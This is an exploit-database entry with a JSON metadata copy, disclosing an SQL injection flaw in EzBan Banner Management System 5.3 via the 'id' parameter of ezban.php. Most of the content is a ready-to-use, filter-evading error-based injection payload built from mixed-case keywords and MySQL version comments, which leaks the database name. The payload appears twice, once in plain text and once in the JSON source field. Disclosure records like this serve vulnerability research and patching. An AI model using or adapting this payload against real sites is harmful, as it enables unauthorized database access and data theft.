ID EXPLOITPACK:29095FE0B77E268D50D4996663024B5B
Type exploitpack
Reporter Ihsan Sencan
Modified 2017-09-07T00:00:00
Description
EzBan 5.3 - id SQL Injection
# # # # #
# Exploit Title: EzBan - Banner Management System 5.3 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.mysticdreams.net/
# Software Link: http://www.mysticdreams.net/resources/ezban_demo.zip
# Demo: http://www.mysticdreams.net/products/ezban/
# Version: 5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Sql
# http://localhost/[PATH]/ezban.php?id=[SQL]&action=show
# 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show
#
# Etc...
# # # # #
{"lastseen": "2020-04-01T19:04:14", "references": [], "description": "\nEzBan 5.3 - id SQL Injection", "edition": 1, "reporter": "Ihsan Sencan", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2017-09-07T00:00:00", "title": "EzBan 5.3 - id SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:14", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-04-01T19:04:14", "rev": 2}, "vulnersScore": -0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-09-07T00:00:00", "id": "EXPLOITPACK:29095FE0B77E268D50D4996663024B5B", "href": "", "viewCount": 0, "sourceData": "# # # # # \n# Exploit Title: EzBan - Banner Management System 5.3 - SQL Injection\n# Dork: N/A\n# Date: 07.09.2017\n# Vendor Homepage: http://www.mysticdreams.net/\n# Software Link: http://www.mysticdreams.net/resources/ezban_demo.zip\n# Demo: http://www.mysticdreams.net/products/ezban/\n# Version: 5.3\n# Category: Webapps\n# Tested on: WiN7_x64/KaLiLinuX_x64\n# CVE: N/A\n# # # # #\n# Exploit Author: Ihsan Sencan\n# Author Web: http://ihsan.net\n# Author Social: @ihsansencan\n# # # # #\n# Description:\n# The vulnerability allows an attacker to inject sql commands....\n# \t\n# Proof of Concept:\n# \n# Sql\n# http://localhost/[PATH]/ezban.php?id=[SQL]&action=show\n# 100++aND(/*!00002SelEcT*/+0x30783331+/*!00002frOM*/+(/*!00002SelEcT*/+cOUNT(*),/*!00002cOnCaT*/((/*!00002sELECT*/(/*!00002sELECT*/+/*!00002cOnCaT*/(cAST(dATABASE()+aS+/*!00002cHAR*/),0x7e,0x496873616E53656e63616e))+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+/*!00002wHERE*/+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(/*!00002rAND*/(0)*2))x+/*!00002FRoM*/+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)+/*!00002aNd*/+1=1&action=show\n# \n# Etc...\n# # # # #", "cvss": {"score": 0.0, "vector": "NONE"}}
{}